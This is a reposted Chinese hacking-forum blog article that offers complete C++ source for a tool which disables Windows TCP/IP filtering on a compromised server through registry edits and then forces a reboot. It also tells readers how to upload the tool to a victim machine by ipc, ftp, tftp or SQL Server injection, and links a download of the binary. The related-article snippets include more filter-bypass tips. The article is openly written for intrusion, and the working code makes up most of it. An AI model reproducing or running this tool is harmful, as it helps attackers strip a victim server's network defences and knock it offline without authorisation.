解除TCP/IP筛选小工具

最新推荐文章于 2024-04-21 16:22:38 发布
最新推荐文章于 2024-04-21 16:22:38 发布
阅读量1.3k 收藏
点赞数
分类专栏: 网上收集 文章标签: 工具 sqlserver null token 服务器 终端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/psyl/article/details/311787
版权
文章来源:邪恶八进制 中国
文章作者:恶猫[E.S.T] (EvilCat[E.S.T])

在入侵的时候有时会遇到明明对方开放了类似于3389终端这样的端口,用终端连接器连接却连不上,说明对方可能做了TCP/IP筛选,大家都知道解除TCP/IP筛选的方法是修改注册表,在对方的shell中导出注册表然后修改,再将修改好的文件导入,然后还要重启对方,这样比较麻烦,不如写个程序,并将程序传入服务器,点击一下就一切OK了,也许这就是程序的好处吧。如何将这个小东西传入对方服务器方法比较多了,ipc,ftp,tftp,用bat还原等等,要是注入中sqlserver是sa权限那就更容易了呵呵。程序比较简单完全是为了方便而写的,在vc6.0下编译通过,2000 advance server sp4下测试通过。代码如下:
/*++

Copyright (c) 2005 邪恶八进制 中国

Author:

恶猫[E.S.T] (EvilCat[E.S.T]) 4-3-2005

--*/
#include <windows.h>
#include <iostream.h>

void main(int argc, char* argv[])
{
HKEY hKey;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId;
LUID luidPrivilegeLUID;
LPCTSTR key[] = {"SYSTEM//CurrentControlSet//Services//Tcpip//Parameters",
"SYSTEM//ControlSet001//Services//Tcpip//Parameters",
"SYSTEM//ControlSet002//Services//Tcpip//Parameters"};
LPCTSTR name = "EnableSecurityFilters";
DWORD dwValue = 0;

for(int i = 0; i < 3; i++)
{
// Open key
if(::RegOpenKeyEx(HKEY_LOCAL_MACHINE,
key[i],
0,
KEY_SET_VALUE,
&hKey) == ERROR_SUCCESS)
{


// Set value
if(::RegSetValueEx(hKey,
name,
0,
REG_DWORD,
reinterpret_cast<BYTE *>(&dwValue),
sizeof(dwValue)) != ERROR_SUCCESS)
{
// Close key
::RegCloseKey(hKey);

// Error handling;
cout<<"Error Setting Register.../n";
return;
}

}
else
{
// Error handling;
cout<<"Error Opening Register.../n";
return;
}

}

ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
if(!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken)
||!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID))
{
cout<<"reboot system Error!/n";
return;
}
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE | EWX_REBOOT, 0);
return;
}
http://www.neeao.com/lbs/attachments/month_200503/05_090416_nkcqEvilCat.rar
psyl
关注
专栏目录
APP渗透测试-信息收集、证书绕过(AppinfoScanner、MobSF、Frida、r0captur)
墨痕诉清风的博客
05-24 672
Firda 是一款易用的跨平 Hook 工具, Java 层到 Native 层的 Hook 无所不能,是一种 动态 的插桩工具,可以插入代码到原生 App 的内存空间中,动态的去监视和修改行为,原生平台包括 Win、Mac、Linux、Android、iOS 全平台。iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、r0capture 仅限安卓平台,测试安卓 7、8、9、10、11 可用;如:Title、Domain、CDN、撞纹信息、状态信息等.
目前最好用的IP筛选
06-03
目前比较好用的筛选器,扫描IP。处理IP。不好勿喷。希望大家会喜欢
关闭TCP/IP筛选的方法及小工具
靖远CserRise的专栏
04-14 922
相信大家都有过这样的经历,入侵的目标Windows服务器主机即便开放了它的终端或是某个指定端口,本地主机也无法连接,但有的端口,比如FTP的21端口、MSSQLServer的1433和1434端口却可以访问,这种情况下,说明对方系统中很有可能是启用了TCP/IP筛选功能,只把允许的端口添加到筛选列表中了,这样除了列表中的端口外,其他端口即便处于开放的状态,远程主机也无法连接。(比防火墙还狠~)
去除TCP/IP筛选
蓝法典的专栏
07-01 1701
TCP/IP筛选在注册表里有三处,分别是:HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/TcpipHKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/TcpipHKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip分别用regedit -e
注册表常用修改方案
weixin_34152820的博客
09-19 440
注册表修改                          ◆过滤IP(适用于WIN2000)在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters下在右边的窗口中修改双字节“EnableSecurityFilters”的值为“1”。  ◆禁止显示IE的地址栏在HKEY_CLASSES_ROOT\CLSI...
SpringSecurity6从入门到上天系列第五篇:详解SpringSecurity6中的Security Filters的作用和原理以及默认的15个核心Security Filters
七叔的博客
11-05 1万+
本文是SpringSecurity6从入门到上天系列第五篇,详细介绍了SpringSecurity6中的Security Filters的作用和原理以及默认的15个核心Security Filters
TCP/IP】基于TCP协议的MQTT协议概述以及简单的Java代码示例
李大有的博客
06-08 2753
一、MQTT MQTT协议是一种基于发布/订阅(publish/subscribe)模式的"轻量级"通讯协议,该协议构建于TCP/IP协议上,由IBM在1999年发布。MQTT最大优点在于,可以以极少的代码和有限的带宽,为连接远程设备提供实时可靠的消息服务。作为一种低开销、低带宽占用的即时通讯协议,使其在物联网、小型设备、移动应用等方面有较广泛的应用。 MQTT是一个基于客户端-服务器的消息发布/订阅传输协议。MQTT协议是轻量、简单、开放和易于实现的,这些特点使它适用范围非常广泛。在很多情况下,包括受限的
mqtt协议简介
qq_39997707的博客
10-13 1405
一、简述 MQTT(Message Queuing Telemetry Transport,消息队列遥测传输协议),是一种基于发布/订阅(publish/subscribe)模式的"轻量级"通讯协议,该协议构建于TCP/IP协议上,由IBM在1999年发布。MQTT最大优点在于,可以以极少的代码和有限的带宽,为连接远程设备提供实时可靠的消息服务。作为一种低开销、低带宽占用的即时通讯协议,使其在物联网、小型设备、移动应用等方面有较广泛的应用。 MQTT是一个基于客户端-服务器的消息发布/订阅传输协议。MQ
测开面经汇总
Ruizxzx的博客
08-01 984
2023届测试开发工程师面经汇总
设置Serv-U FTP 支持被动模式连接 ,530错误等解决办法集锦
09-30
4. 如果有防火墙、IP筛选或安全策略限制了PASV端口,需要解除这些限制。 **客户端的PASV模式设置:** 某些FTP客户端软件如FlashGet、CutFTP、FlashFXP和NetAnts等,它们可能默认使用PASV模式。若服务器不支持PASV...
10款用于查询IP地址的工具网站
最新发布
2401_84466325的博客
04-21 2845
首先,在网络安全领域,IP地址的查询功能尤为重要,它使得网络管理员能够追踪到设备的网络位置,从而迅速锁定并处理潜在的网络威胁来源。在互联网的海洋中,每个设备均通过一个独一无二的IP地址进行标识,通过这一地址,可以轻易确定设备的身份及其所在的网络环境。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
经验总结 黑客入侵网络的50种方法3
河北正定欢迎您-少占鱼
10-23 1009
45.解决TCP/IP筛选 在注册表里有三处,分别是:   HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
Win10 修改 IP 安全策略过滤某个IP的访问
热门推荐
zhbpd的专栏
11-14 1万+
参考:http://zhidao.baidu.com/question/39911181.html 原因:屏蔽运营商流氓广告, http://tieba.baidu.com/p/1744589289, http://www.cnblogs.com/trustnature/articles/3288684.html Win10 的操作步骤如下: 1. 在桌面左下角windows图标上点击鼠标右
修改注册表防范DDOS攻击的方法
ysf0181的专栏
05-10 1352
注册表是一个服务器系统的核心,它不但能对服务器的功能进行配置,而且还能有效缓解一部分DDoS的攻击,下面我们就详细介绍一下如何利用注册表防御DDoS攻击的方法,在高防服务器的基础上,更能增加DDoS的防御性,但是需要注意的是,该设置的性能取决于服务器的配置,尤其是CPU的处理能力,如果你所租用的高防服务器为至强2.4G或以上,那么通过注册表防御能够将防御的性能提升承受1万个包的攻击量。 注册表防御...
服务器安全策略之《通过IP安全策略阻止某个IP访问的设置方法》
weixin_30800987的博客
07-11 1547
现在我们在布署好了一个网站,发布到外网后就意味着将会接受来自四面八方的黑客攻击,这个情况很常见,我们的网站基本上每天都要接受成千上万次的攻击,有SQL注入的、有代码注入的、有CC攻击等等。。。而我作为一个程序员出生的,其实对于服务器管理方面是懂得很少的,而公司现在基本上我就是站长,我必须什么都得弄,什么都得去学会。我们曾经也被攻击成功后,大量网页被注入代码,文件中也注入了大量的后门,为此公安局还找...
简单的“TCP/IP筛选
zly22169846的专栏
10-29 4085
   ---- Windows 2000配备的TCP/IP滤波机构只能进行简单控制,不能将IP地址和IP包的流向作为控制参数。 “TCP/IP筛选”操作方法:在“本地连接属性”画面,双击“Internet协议(TCP/IP)”后,选定对话框右下侧的“高级”按钮; 然后,选择“高级TCP/IP设定”*“选项”*“TCP/IP筛选”,弹出“TCP/IP筛选”画面(如图2所示)即可。  
命令行破解"组策略ip筛选"和"tcp/ip筛选
weixin_30875157的博客
08-03 252
"组策略ip筛选"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\IPSec\Policy\Local\ipsecPolicy{字符}在里面找到相干的,删"tcp/ip筛选"停用服务IPSECPolicyAgent或者:reged...
借助协议分析工具深入学习TCP/IP
"这篇文章主要介绍了如何使用协议分析工具来学习TCP/IP协议,强调了TCP/IP在互联网中的基础地位,提出了一种通过实际操作和观察数据传输来深化理解的方法。作者构建了一个简单的网络环境,由两台运行Windows 2000...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值